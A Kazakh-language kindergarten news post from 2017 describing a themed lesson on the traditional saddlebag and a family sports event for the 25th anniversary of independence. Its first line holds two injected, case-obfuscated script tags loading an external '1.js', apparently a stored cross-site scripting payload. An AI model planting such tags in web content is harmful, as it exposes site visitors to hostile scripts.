<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.07.2017

МКҚК №38 «Сәуле» бөбекжай

бақшасының іс-шаралары

Балалар-біздің болашағымыз,оларға ұлттық құндылықтарды

бойына сіңіру қажет.Бөбекжай бақшамыз осыған көп назар аударады.  Тәрбиеші Жусупова Ляззат Кеңесқызы «Сиқырлы

қоржын» атты тақырыптық сабақ өтті .Балаларға слайд арқылы қоржын не екенін түсіндіріліп,ою-өрнектерді

жапсырып, келген қонақ қуыршақ Мадинаны қарсы алып, риза болды. Қонақтың

тапсырмалары орындалды.Осындай тартымды,сабақтар келешек ұрпаққа тәрбиелі болып

өтуіне ықпал етеді.

Қазіргі таңда балабақшаға

үлкен жауапкершілік артылып отыр. Бала тәрбиесі-баршаның ісі. Ата-аналар мен

балабақша тығыз байланыста екені бәріне мәлім. «Сәуле»бөбекжай бақшасында Тәуелсіздігіміздің

25 жылдығына әр түрлі іс-шаралар өткізілуде. 5-ші ересек тобында ата-аналарының

арасында спорттық отбасылық сайыс өтті. Жас маман дене шынықтыру мұғалімі

Қайыржан Құрман Еслямбекұлы  және тәрбиешілер

 Карбаева Р.К, Рахимбаева М.М.бірлесіп

есте қалатындай 6 кезеңдік ойын-тартыс жүргізді.Балалардың және ата-аналардың

әр түрлі жаттығулар жасату арқылы денсаулықтарына, қарым-қатынастарына көңіл

бөлінді. Ата-аналар марапаттау қағазға иеленіп, ризашылықтарын білдіртіп кетті.

Просмотров: 494


Пікір қосу



Деректерді қолтаңбаға қосу